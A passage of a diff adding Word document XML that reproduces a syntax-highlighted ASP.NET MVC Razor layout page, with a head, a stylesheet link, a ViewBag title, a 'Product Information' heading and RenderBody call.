+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="800000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>head</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="800000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>meta</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="FF0000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>name</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>="viewport"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="FF0000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>content</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>="width=device-width"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>/&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="800000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>link</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="FF0000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>href</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>="~/Content/Views/common.css"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="FF0000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>rel</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>="stylesheet"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>/&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="800000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>title</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>@</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>ViewBag.Title</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&lt;/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="800000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>title</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&lt;/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="800000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>head</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="800000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>body</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="800000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>h1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        Product Information</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&lt;/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="800000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>h1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="800000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>div</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>@</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>RenderBody()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&lt;/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="800000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>div</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
